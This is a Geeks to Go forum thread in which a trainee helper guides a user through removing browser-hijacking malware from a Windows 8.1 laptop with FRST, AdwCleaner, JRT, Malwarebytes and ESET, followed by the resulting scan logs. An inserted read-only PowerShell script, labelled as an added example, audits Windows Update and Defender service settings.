HP Utility Center (HKLM\...\{891A1782-8B20-4403-8383-458962525926}) (Version: 2.3.4 - Hewlett-Packard Company)
HP Wireless Button Driver (HKLM-x32\...\{30B2D1D8-0A07-4B71-9553-0710C5D31E35}) (Version: 1.1.2.1 - Hewlett-Packard Company)
Inst5675 (Version: 8.01.11 - Softex Inc.) Hidden
Inst5676 (Version: 8.01.11 - Softex Inc.) Hidden
Malwarebytes Anti-Malware version 2.1.8.1057 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.1.8.1057 - Malwarebytes Corporation)
Microsoft Office (HKLM-x32\...\{90150000-0138-0409-0000-0000000FF1CE}) (Version: 15.0.4569.1506 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Movie Maker (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
OEM Application Profile (HKLM-x32\...\{315F1A48-D883-B234-7C79-15873574ACC1}) (Version: 1.00.0000 - Advanced Micro Devices, Inc.)
OpenAL (HKLM-x32\...\OpenAL) (Version:  - )
Panda Devices Agent (HKLM-x32\...\Panda Devices Agent) (Version: 1.03.04 - Panda Security)
Panda Devices Agent (x32 Version: 1.05.00 - Panda Security) Hidden
Panda Free Antivirus (HKLM-x32\...\Panda Universal Agent Endpoint) (Version: 15.01.00.0006 - Panda Security)
Panda Free Antivirus (Version: 7.84.00.0000 - Panda Security) Hidden
Qualcomm Atheros Bluetooth Suite (64) (HKLM\...\{A84A4FB1-D703-48DB-89E0-68B6499D2801}) (Version: 8.0.1.232 - Qualcomm Atheros)
Qualcomm Atheros Driver Installation Program (HKLM-x32\...\{C3A32068-8AB1-4327-BB16-BED9C6219DC7}) (Version: 10.0 - Qualcomm Atheros)
Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 6.3.9600.29075 - Realtek Semiconductor Corp.)
Realtek Ethernet Controller All-In-One Windows Driver (HKLM-x32\...\{F7E7F0CB-AA41-4D5A-B6F2-8E6738EB063F}) (Version: 8.24.1218.2013 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7164 - Realtek Semiconductor Corp.)
Roads of Rome 3 (x32 Version: 2.2.0.98 - WildTangent) Hidden
Steam (HKLM-x32\...\{048298C9-A4D3-490B-9FF9-AB023A9238F3}) (Version: 1.0.0.0 - Valve Corporation)
swMSM (x32 Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
VLC media player (HKLM-x32\...\VLC media player) (Version: 2.2.1 - VideoLAN)
WildTangent Games (HKLM-x32\...\WildTangent wildgames Master Uninstall) (Version: 1.0.4.0 - WildTangent)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3508.0205 - Microsoft Corporation)
WinRAR 5.21 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.21.0 - win.rar GmbH)
 
==================== Custom CLSID (Whitelisted): ==========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
 
==================== Restore Points =========================
 
 
==================== Hosts content: ===============================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2013-08-22 23:25 - 2013-08-22 23:25 - 00000824 ____A C:\Windows\system32\Drivers\etc\hosts
 
==================== Scheduled Tasks (Whitelisted) =============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
Task: {1D1EFFDD-FFEF-41BA-8406-9E014220D816} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-09-03] (Google Inc.)
Task: {439E8759-4791-4EEA-A839-18CE850C33B7} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-09-03] (Google Inc.)
Task: {5BAB93B1-05E8-4C35-ADE2-2CE61829406C} - System32\Tasks\CLMLSvc_P2G8 => C:\Program Files (x86)\CyberLink\Power2Go8\CLMLSvc_P2G8.exe [2013-08-05] (CyberLink)
Task: {780563C7-45A1-45E2-85FF-2EAFA6B0AC61} - System32\Tasks\CLVDLauncher => C:\Program Files (x86)\CyberLink\Power2Go8\CLVDLauncher.exe [2013-03-13] (CyberLink Corp.)
Task: {B1EA828C-2A31-4235-AD2A-081FDBFFB3B7} - System32\Tasks\YCMServiceAgent => C:\Program Files (x86)\CyberLink\YouCam\YouCamService.exe [2014-03-07] (CyberLink Corp.)
 
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
 
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
 
==================== Loaded Modules (Whitelisted) ==============
 

 


#2
Nevan
    Trusted Helper
  • Malware Removal
  • 1,765 posts
Hello, xander291190. Welcome to Geeks to Go! My nickname is Nevan and I will be helping you get your system back on its electronic feet.

Before we get started, please keep these things in mind:
  • Always read every part of my post carefully. If you don't, you may do something wrong and there could be more problems to solve.
  • If your security programs give you any warnings when using tools I asked you to, don't be afraid. Every tool I provide to you is 100% safe.
  • Only run tools that I ask you to. Some of them can be dangerous to your system as they have much power.
  • You should save or print my instructions. It is possible that we will be using Safe mode, which will cut you off from your internet connection and without access to them, you might be stuck.
  • Malware removal is a complicated process that takes multiple steps to be completed. Don't give up, be patient.
  • The tools we are going to use and your software may cause unwanted interactions. Because of that, I recommend that you make backups of any important files from your machine before proceeding, as they might be lost.
  • I recommend that you stay with me until I tell you that we are done. This is important because even when your system no longer shows any bad symptoms, that does not mean it is 100% clean.
  • Your time to reply is limited. If you don't reply within 3 days, your topic will be closed and you will have to request it to be reopened by contacting one of Moderator group members with the link to this topic.
  • Every program I ask you to download should be saved to and run from desktop. If you don't know how to choose the direction of where a download is saved, check this site. You can also just copy these programs to your desktop manually and then run them from there.
  • Remember that the fixes I give you are only for your machine. Using them on other systems may (and probably will) cause problems.
  • Finally, if you have any questions or are unsure about something, just ask. I will not blame you for it. It is better to ask rather than regret it later.
Also, please note that I'm currently in training, so my answers to you will have to be checked first by an experienced helper before I can post them. This can lengthen the time between my answers to you, but in return you will have an extra person reviewing your log.

 
It looks like the Addition.txt you've posted isn't complete. Can you please launch FRST again (make sure that Addition.txt is checked) and post the new logs?

Try attaching them to your post. It may be that the content is too big to fit in one post and that's why it's been cut.

#3 xander291190 (Member, Topic Starter, 13 posts)

Hi Nevan, thanks very much for helping me out!

 

I've run the scan again; I attached the documents this time, so hopefully all the information will be there.

Attached Files

#4 Nevan (Trusted Helper, Malware Removal, 1,765 posts)
Hello again, xander291190.

A small thing first...

P2P Warning

I've noticed that you have or have had a P2P (Peer-to-Peer) file sharing program on your machine:
  • µTorrent
It is important to stay away from them as they are used to share pirated material. The programs themselves can be safe, but the majority of the files shared through them are infected.

Some of things to keep in mind when using P2P programs:
  • Your computer is more likely to get infected with malware, which will result in coming back to our or other forums for help.
  • You may have your important data stolen, including passwords, photos or personal information.
  • You help to share pirated material, which may result in arrest, fines, or even jail time for illegal downloads of copyrighted material.
If I still didn't convince you, please read these short reports about how dangerous it can be to use P2P programs:

Whether you remove them or not is your decision, though I strongly recommend that you uninstall your P2P programs as they will most likely cause problems in the future.

If you choose not to remove them, please refrain from using them until we are done cleaning your computer.

 
Let's begin the cleaning. Please tell me if this helps with your problem.

Step #1
FRST Fix
  • Download attached fixlist.txt file to your desktop.
    Attached File  fixlist.txt   2.53KB   120 downloads
    NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system
  • Right click FRST64.exe on your desktop and click Run as administrator.
  • Press the Fix button just once and wait.
    NOTE: It's important that both FRST64.exe and fixlist.txt are in the same location or the fix will not work.
  • If for some reason the tool needs a restart, please make sure you let the system restart normally. After that let the tool complete its run.
  • When finished, FRST will generate a log on the desktop (Fixlog.txt). Select all (CTRL+A) the content of the log, copy it (CTRL+C) and paste (CTRL+V) it into your next reply.
 
Step #2
RogueKiller

Download RogueKiller to your desktop. Make sure to choose RogueKillerX64.exe.
  • Quit all running programs
  • Right click RogueKillerX64.exe and click Run as administrator
  • The program will start the prescan once it's launched. Please wait until it's done and click Scan button.
  • Once the scanning is done, "Scan finished. Please look at the different tabs and check/uncheck needed items before pressing the delete button" message will appear. When it happens, click Report button. The scan log will open.
  • Select all (CTRL+A) the content of the log, copy it (CTRL+C) and paste (CTRL+V) it into your next reply.
 
Step #3
Farbar Service Scanner
  • Download FSS.exe to your desktop.
  • Right click FSS.exe on your desktop and click Run as administrator.
  • Make sure that all options are checked and click Scan
  • It will create a log (FSS.txt) on the Desktop.
  • Double click FSS.txt. Select all (CTRL+A) the content of the log, copy it (CTRL+C) and paste (CTRL+V) it into your next reply
 
Things that should appear in your next post:
  • Fixlog.txt log content
  • RogueKiller log content
  • FSS.txt log content
  • Does that problem with Chrome still appear?


#5 xander291190 (Member, Topic Starter, 13 posts)

Hi again Nevan,

 

Apologies it's taking me a bit of time to get the info you asked for. The virus is taking up a lot of my computer's processing speed, so completing the scans without it crashing has been an issue; nearly done now though.

 

Just noticed reading through your advice again, that you mentioned letting you know if there were any further symptoms during the fixing process, a couple have appeared.

 

Firstly, it's not just Chrome that is doing it now; Internet Explorer is doing almost exactly the same thing, though its processes have a different name.

 

Also my Chrome now doesn't work at all, and even when I don't try to use it, an error message frequently appears. It shows as:

 

'The instruction at 0x08d236b0 referenced at memory 0x000aaea. The memory could not be read. Click OK to terminate the program'

 

I'll have the files uploaded for you shortly, just thought I'd let you know whilst I was waiting for the scan to finish.



#6 xander291190 (Member, Topic Starter, 13 posts)

Hello once more Nevan,

 

Following on from my previous post a little while ago, I've finished the scans that you asked for. I had to attach them as .txt documents instead of copying and pasting them, as my computer was having an issue pasting the information. I hope that's alright; sorry for the inconvenience.

 

Good news, the issue seems to have cleared up! Brilliant result!

 

Also I deleted µTorrent like you recommended. I reckon that's how the virus got in, so I'll be steering clear of that from now on.

 

Just wanted to say I really appreciate your help mate, this was really stressing me out as I'm off travelling with the laptop very soon and needed it sorted. But you were quick to reply, and the help you provided was easy to understand and worked perfectly, so thank you very much!

 

Is there anything else you need from me or need me to do?

Attached Files

#7 Nevan (Trusted Helper, Malware Removal, 1,765 posts)
Hello again, xander291190.

I'm glad to hear that the problem is gone. However, we still have some cleaning to do so please stay with me until I tell you that we're done :)

Perform the following instructions.

Step #1
Windows Repair (All-in-One) Portable
  • Download Windows Repair (All-in-One) Portable to your Desktop and unpack it (right click the file and click Extract All, then click Extract). A folder named Tweaking.com - Windows Repair will appear.
  • Locate and double-click Repair_Windows.exe to run the program.
  • Click on the Repairs tab, untick Automatically do a registry backup and then click Open Repairs.
  • A new window will open with the default options checked. Click the Unselect All button at the bottom of the window. All check marks from all the boxes will disappear.
  • Check the boxes next to the following options:
    • 03 - Reset Service Permissions
    • 06 - Repair Windows Firewall
    • 17 - Repair Windows Updates
    • 26 - Restore Important Windows Services
    • 27 - Set Windows Services To Default Startup
  • Also, check Restart/Shutdown System When Finished and Restart System.
  • Click Start Repairs button.
 
Step #2
Junkware Removal Tool
  • Download Junkware Removal Tool to your Desktop
  • Close any open windows
  • Disable your Antivirus program (click here if you don't know how to do this)
  • Double click JRT.exe on your desktop to run it
  • Click any button to start the scan
  • Wait for Junkware Removal Tool to finish the scan
  • When the scan is finished, JRT.txt will be saved to your desktop and it will automatically open
  • Select all (CTRL+A) the content of the log, copy it (CTRL+C) and paste (CTRL+V) it into your next reply.
 
Step #3
AdwCleaner
  • Close any open windows
  • Double click adwcleaner_5.005.exe you have in your Downloads folder to run it
  • Click the Scan button
  • Wait for AdwCleaner to finish the scan
  • When the scan is finished, a "Pending. Please uncheck elements you don't want to remove" message will appear. Leave everything as it is and click the Clean button.
  • When the cleaning is finished, the program will ask you to reboot the system. Please do so.
  • Once your machine has rebooted, a Notepad window will open. If it doesn't, you can find the report in C:\AdwCleaner. It will be saved as AdwCleaner[C2].txt.
  • Select all (CTRL+A) the content of the log, copy it (CTRL+C) and paste (CTRL+V) it into your next reply.
Remember to enable your Antivirus program once you're done!

Also, please open the old AdwCleaner log file from C:\AdwCleaner\AdwCleaner[C1].txt and post its content here.

 
Step #4
Farbar Service Scanner
  • Right click FSS.exe on your desktop and click Run as administrator.
  • Make sure that all options are checked and click Scan
  • It will create a log (FSS.txt) on the Desktop.
  • Double click FSS.txt. Select all (CTRL+A) the content of the log, copy it (CTRL+C) and paste (CTRL+V) it into your next reply
 
Things that should appear in your next post:
  • JRT.txt log content
  • AdwCleaner[C1].txt log content
  • AdwCleaner[C2].txt log content
  • FSS.txt log content


#8 xander291190 (Member, Topic Starter, 13 posts)

Hi,

 

No problem, I'll wait until you say it's all good :)

 

Here's the scan results:

 

JRT:

 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Malwarebytes
Version: 7.6.0 (08.31.2015:1)
OS: Windows 8.1 Connected x64
Ran by user on Sun 06/09/2015 at  2:32:29.90
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
 
 
 
~~~ Services
 
 
 
~~~ Tasks
 
 
 
~~~ Registry Values
 
 
 
~~~ Registry Keys
 
 
 
~~~ Files
 
 
 
~~~ Folders
 
 
 
~~~ Chrome
 
 
[C:\Users\user\Appdata\Local\Google\Chrome\User Data\Default\Preferences] - default search provider reset
 
[C:\Users\user\Appdata\Local\Google\Chrome\User Data\Default\Preferences] - Extensions Deleted:
 
[C:\Users\user\Appdata\Local\Google\Chrome\User Data\Default\Secure Preferences] - default search provider reset
 
[C:\Users\user\Appdata\Local\Google\Chrome\User Data\Default\Secure Preferences] - Extensions Deleted:
[]
 
 
 
 
 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on Sun 06/09/2015 at  2:38:15.71
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
ADWCleaner C1:
 
# AdwCleaner v5.005 - Logfile created 03/09/2015 at 02:04:40
# Updated 31/08/2015 by Xplode
# Database : 2015-08-31.2 [Server]
# Operating system : Windows 8.1 Connected  (x64)
# Username : user - HP
# Running from : C:\Users\user\Downloads\adwcleaner_5.005.exe
# Option : Cleaning
 
***** [ Services ] *****
 
 
***** [ Folders ] *****
 
[-] Folder Deleted : C:\Program Files (x86)\GSafe
[-] Folder Deleted : C:\Users\user\AppData\Local\Temp\GSafe
 
***** [ Files ] *****
 
 
***** [ Shortcuts ] *****
 
 
***** [ Scheduled tasks ] *****
 
 
***** [ Registry ] *****
 
 
***** [ Web browsers ] *****
 
[-] [C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data] [Search Provider] Deleted : vlc-media-player.en.softonic.com
 
*************************
 
:: Winsock settings cleared
 
########## EOF - C:\AdwCleaner\AdwCleaner[C1].txt - [855 bytes] ##########
 
ADWCleaner C2:
 
# AdwCleaner v5.005 - Logfile created 06/09/2015 at 03:37:33
# Updated 31/08/2015 by Xplode
# Database : 2015-09-04.4 [Server]
# Operating system : Windows 8.1 Connected  (x64)
# Username : user - HP
# Running from : C:\Users\user\Downloads\adwcleaner_5.005.exe
# Option : Cleaning
 
***** [ Services ] *****
 
 
***** [ Folders ] *****
 
 
***** [ Files ] *****
 
 
***** [ Shortcuts ] *****
 
 
***** [ Scheduled tasks ] *****
 
 
***** [ Registry ] *****
 
 
***** [ Web browsers ] *****
 
 
*************************
 
:: Winsock settings cleared
 
########## EOF - C:\AdwCleaner\AdwCleaner[C2].txt - [606 bytes] ##########
 
FSS:
 
Farbar Service Scanner Version: 26-07-2015
Ran by user (administrator) on 06-09-2015 at 03:53:25
Running from "C:\Users\user\Downloads"
Microsoft Windows 8.1 with Bing  (X64)
Boot Mode: Normal
****************************************************************
 
Internet Services:
============
 
Connection Status:
==============
Localhost is accessible.
LAN connected.
Google IP is accessible.
Google.com is accessible.
Yahoo.com is accessible.
 
 
Windows Firewall:
=============
 
Firewall Disabled Policy: 
==================
 
 
System Restore:
============
 
System Restore Policy: 
========================
 
 
Action Center:
============
 
 
Windows Update:
============
wuauserv Service is not running. Checking service configuration:
The start type of wuauserv service is set to Demand. The default start type is Auto.
The ImagePath of wuauserv service is OK.
The ServiceDll of wuauserv service is OK.
 
 
Windows Autoupdate Disabled Policy: 
============================
 
 
Windows Defender:
==============
WinDefend Service is not running. Checking service configuration:
The start type of WinDefend service is OK.
The ImagePath of WinDefend: ""%ProgramFiles%\Windows Defender\MsMpEng.exe"".
 
 
Windows Defender Disabled Policy: 
==========================
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender]
"DisableAntiSpyware"=DWORD:1
 
 
Other Services:
==============
 
 
File Check:
========
C:\Windows\System32\nsisvc.dll => File is digitally signed
C:\Windows\System32\drivers\nsiproxy.sys => File is digitally signed
C:\Windows\System32\dhcpcore.dll => File is digitally signed
C:\Windows\System32\drivers\afd.sys => File is digitally signed
C:\Windows\System32\drivers\tdx.sys => File is digitally signed
C:\Windows\System32\Drivers\tcpip.sys => File is digitally signed
C:\Windows\System32\dnsrslvr.dll => File is digitally signed
C:\Windows\System32\mpssvc.dll => File is digitally signed
C:\Windows\System32\bfe.dll => File is digitally signed
C:\Windows\System32\drivers\mpsdrv.sys => File is digitally signed
C:\Windows\System32\wscsvc.dll => File is digitally signed
C:\Windows\System32\wbem\WMIsvc.dll => File is digitally signed
C:\Windows\System32\wuaueng.dll => File is digitally signed
C:\Windows\System32\qmgr.dll => File is digitally signed
C:\Windows\System32\es.dll => File is digitally signed
C:\Windows\System32\cryptsvc.dll => File is digitally signed
C:\Program Files\Windows Defender\MpSvc.dll => File is digitally signed
C:\Program Files\Windows Defender\MsMpEng.exe => File is digitally signed
C:\Windows\System32\ipnathlp.dll => File is digitally signed
C:\Windows\System32\iphlpsvc.dll => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
 
 
**** End of log ****

 


#9 Nevan (Trusted Helper, Malware Removal, 1,765 posts)
Hello again, xander291190.
 

No problem, I'll wait until you say it's all good :)

:thumbsup:

Let's continue.

Step #1
Registry repair

Download the attached .reg files to your Desktop.
Attached File  WinDefend.reg   7KB   47 downloads
Attached File  wuauserv.reg   6.86KB   54 downloads

Launch the files by double-clicking them. Allow the files to be added to the registry.
Once you're done, restart your system.

 
Step #2
Farbar Service Scanner
  • Right click FSS.exe on your desktop and click Run as administrator.
  • Make sure that all options are checked and click Scan
  • It will create a log (FSS.txt) on the Desktop.
  • Double click FSS.txt. Select all (CTRL+A) the content of the log, copy it (CTRL+C) and paste (CTRL+V) it into your next reply
 
Step #3
Malwarebytes Anti-Malware

I can see that you currently have Malwarebytes Anti-Malware installed on your computer. We'll use it.
  • Launch Malwarebytes Anti-Malware
  • In Database version section, click Update Now
  • Once the update is done, click Settings>Detection and Protection
  • Make sure that all three boxes under Detection Options are checked
    [screenshot: Detection Options]
  • Go back to Dashboard and click the big, green Scan Now button.
  • Wait for Malwarebytes Anti-Malware to finish the scan
  • If the program detects anything, click Remove Selected. The program might want to reboot the system. Allow it if it wants to.
  • Once the deletion is done (or after reboot), go to History, select Application Logs and click the latest Scan Log.
  • Click Export, then click Copy to Clipboard.
  • Paste (CTRL+V) the log into your next reply.
 
Step #4
ESET Online Scanner
  • Note: This step can only be done using Internet Explorer, Google Chrome or Mozilla Firefox
  • Disable your Antivirus program (click here if you don't know how to do this).
  • Visit ESET site
  • Click the button on the ESET page to launch the scanner
  • When using:
    • Internet Explorer:
      • Accept the Terms of Use and click Start
      • Allow the running of add-on
    • Other browsers:
      • Download esetsmartinstaller_enu.exe that you'll be given link to
      • Double click esetsmartinstaller_enu.exe
      • Allow the Terms of Use and click Start
  • Make sure that the options are set as the example below:
    [screenshot: ESET scan options]
  • Click Start
  • The program will begin to download its virus database. The speed may vary depending on your Internet connection.
  • When completed, the program will begin to scan. This may take several hours. Please, be patient.
  • Do not do anything on your machine as it may interrupt the scan
  • When the scan is done, click Finish
  • A log.txt file will be created at C:\Program Files (x86)\ESET\ESET Online Scanner. Open it using Notepad.
  • Select all (CTRL+A) the content of the log, copy it (CTRL+C) and paste (CTRL+V) it into your next reply.
Remember to enable your Antivirus program once you're done!

 
Things that should appear in your next post:
  • FSS.txt log content
  • Malwarebytes Anti-Malware log content
  • ESET Online Scanner log content
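
A read-only check of what the FSS log reported, as an added PowerShell example that is not from the thread or from Farbar's tools. It assumes an elevated Windows PowerShell session on the Windows 8.1 machine in this thread; the "expected" values (Auto start types, signed service binaries, no DisableAntiSpyware value) are assumptions taken from the FSS log above and Windows 8.1 defaults.

```powershell
# Added example, not code from the thread or from Farbar's tools: a read-only
# audit of the items the FSS log flagged (wuauserv start type, WinDefend state,
# the DisableAntiSpyware value, and the signatures of the service binaries).
# Assumes an elevated Windows PowerShell 5.1 session. Expected start types are
# assumptions: Auto for wuauserv (the default FSS names in the log) and Auto
# for WinDefend (the Windows 8.1 default). Nothing is changed by this script.

$findings = New-Object 'System.Collections.Generic.List[string]'

function Test-ServiceConfig {
    param(
        [string]$Name,
        [string]$ExpectedStartMode,    # 'Auto' or 'Manual', as Win32_Service reports it
        [string]$ExpectedPathPattern   # regex the service ImagePath must match
    )
    $svc = Get-CimInstance -ClassName Win32_Service -Filter "Name='$Name'"
    if (-not $svc) { $findings.Add("${Name}: service not present"); return }
    if ($svc.StartMode -ne $ExpectedStartMode) {
        $findings.Add("${Name}: start type is $($svc.StartMode), default is $ExpectedStartMode")
    }
    if ($svc.PathName -notmatch $ExpectedPathPattern) {
        $findings.Add("${Name}: unexpected ImagePath '$($svc.PathName)'")
    }
    if ($svc.State -ne 'Running') {
        $findings.Add("${Name}: not running (State=$($svc.State))")
    }
}

function Test-SignedFile {
    param([string]$Path)
    # ServiceDll is normally REG_EXPAND_SZ (%systemroot%\...), so expand it first
    $resolved = [Environment]::ExpandEnvironmentVariables($Path)
    if (-not (Test-Path -LiteralPath $resolved)) { $findings.Add("${resolved}: missing"); return }
    # Mirrors the FSS "File is digitally signed" check; catalog signatures count as Valid
    $sig = Get-AuthenticodeSignature -FilePath $resolved
    if ($sig.Status -ne 'Valid') {
        $findings.Add("${resolved}: signature status is $($sig.Status)")
    }
}

# Windows Update: hosted in svchost.exe, code lives in the ServiceDll (wuaueng.dll).
# The log showed the start type changed to Demand (Manual) from the default Auto.
Test-ServiceConfig -Name 'wuauserv' -ExpectedStartMode 'Auto' -ExpectedPathPattern 'svchost\.exe'
$wuParams = Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Services\wuauserv\Parameters' `
                             -ErrorAction SilentlyContinue
if ($wuParams -and $wuParams.ServiceDll) { Test-SignedFile -Path $wuParams.ServiceDll }
else { $findings.Add('wuauserv: ServiceDll value missing') }

# Windows Defender: runs its own binary, MsMpEng.exe under Program Files.
Test-ServiceConfig -Name 'WinDefend' -ExpectedStartMode 'Auto' -ExpectedPathPattern 'MsMpEng\.exe'
Test-SignedFile -Path (Join-Path $env:ProgramFiles 'Windows Defender\MsMpEng.exe')

# The value FSS reported under "Windows Defender Disabled Policy". Checked in the
# product key (where FSS found it) and in the Group Policy key.
foreach ($key in 'HKLM:\SOFTWARE\Microsoft\Windows Defender',
                 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender') {
    $v = Get-ItemProperty -Path $key -Name DisableAntiSpyware -ErrorAction SilentlyContinue
    if ($v -and $v.DisableAntiSpyware -eq 1) {
        $findings.Add("$key\DisableAntiSpyware = 1 (Defender is disabled by this value)")
    }
}

if ($findings.Count -eq 0) { 'No drift from the expected configuration.' }
else { $findings | ForEach-Object { "FINDING: $_" } }
```

Run it before and after importing the .reg files above to confirm the drift is gone. On Windows 8.1 a third-party antivirus registered with Security Center legitimately stops WinDefend, so that finding on its own is not evidence of tampering.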


#10 xander291190 (Member, Topic Starter, 13 posts)

Here we go.

 

FSS:

 

Farbar Service Scanner Version: 26-07-2015
Ran by user (administrator) on 06-09-2015 at 09:29:40
Running from "C:\Users\user\Downloads"
Microsoft Windows 8.1 with Bing  (X64)
Boot Mode: Normal
****************************************************************
 
Internet Services:
============
 
Connection Status:
==============
Localhost is accessible.
LAN connected.
Google IP is accessible.
Google.com is accessible.
Yahoo.com is accessible.
 
 
Windows Firewall:
=============
 
Firewall Disabled Policy: 
==================
 
 
System Restore:
============
 
System Restore Policy: 
========================
 
 
Action Center:
============
 
 
Windows Update:
============
wuauserv Service is not running. Checking service configuration:
The start type of wuauserv service is set to Demand. The default start type is Auto.
The ImagePath of wuauserv service is OK.
The ServiceDll of wuauserv service is OK.
 
 
Windows Autoupdate Disabled Policy: 
============================
 
 
Windows Defender:
==============
WinDefend Service is not running. Checking service configuration:
The start type of WinDefend service is OK.
The ImagePath of WinDefend service is OK.
 
 
Windows Defender Disabled Policy: 
==========================
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender]
"DisableAntiSpyware"=DWORD:1
 
 
Other Services:
==============
 
 
File Check:
========
C:\Windows\System32\nsisvc.dll => File is digitally signed
C:\Windows\System32\drivers\nsiproxy.sys => File is digitally signed
C:\Windows\System32\dhcpcore.dll => File is digitally signed
C:\Windows\System32\drivers\afd.sys => File is digitally signed
C:\Windows\System32\drivers\tdx.sys => File is digitally signed
C:\Windows\System32\Drivers\tcpip.sys => File is digitally signed
C:\Windows\System32\dnsrslvr.dll => File is digitally signed
C:\Windows\System32\mpssvc.dll => File is digitally signed
C:\Windows\System32\bfe.dll => File is digitally signed
C:\Windows\System32\drivers\mpsdrv.sys => File is digitally signed
C:\Windows\System32\wscsvc.dll => File is digitally signed
C:\Windows\System32\wbem\WMIsvc.dll => File is digitally signed
C:\Windows\System32\wuaueng.dll => File is digitally signed
C:\Windows\System32\qmgr.dll => File is digitally signed
C:\Windows\System32\es.dll => File is digitally signed
C:\Windows\System32\cryptsvc.dll => File is digitally signed
C:\Program Files\Windows Defender\MpSvc.dll => File is digitally signed
C:\Program Files\Windows Defender\MsMpEng.exe => File is digitally signed
C:\Windows\System32\ipnathlp.dll => File is digitally signed
C:\Windows\System32\iphlpsvc.dll => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
 
 
**** End of log ****
 
MalwareBytes:
 
Malwarebytes Anti-Malware
www.malwarebytes.org
 
Scan Date: 6/09/2015
Scan Time: 9:32 AM
Logfile: MalwareBytes.txt
Administrator: Yes
 
Version: 2.1.8.1057
Malware Database: v2015.09.05.07
Rootkit Database: v2015.08.16.01
License: Trial
Malware Protection: Enabled
Malicious Website Protection: Enabled
Self-protection: Disabled
 
OS: Windows 8.1
CPU: x64
File System: NTFS
User: user
 
Scan Type: Threat Scan
Result: Cancelled
Objects Scanned: 0
(No malicious items detected)
Time Elapsed: 0 min, 36 sec
 
Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Disabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled
 
Processes: 0
(No malicious items detected)
 
Modules: 0
(No malicious items detected)
 
Registry Keys: 0
(No malicious items detected)
 
Registry Values: 0
(No malicious items detected)
 
Registry Data: 0
(No malicious items detected)
 
Folders: 0
(No malicious items detected)
 
Files: 0
(No malicious items detected)
 
Physical Sectors: 0
(No malicious items detected)
 
 
(end)
 
[email protected] as downloader log:
all ok
# product=EOS
# version=8
# OnlineScannerApp.exe=1.0.0.1
# EOSSerial=9b95a216f1e7ab4aa0efb9290f3ec81f
# end=init
# utc_time=2015-09-06 12:13:44
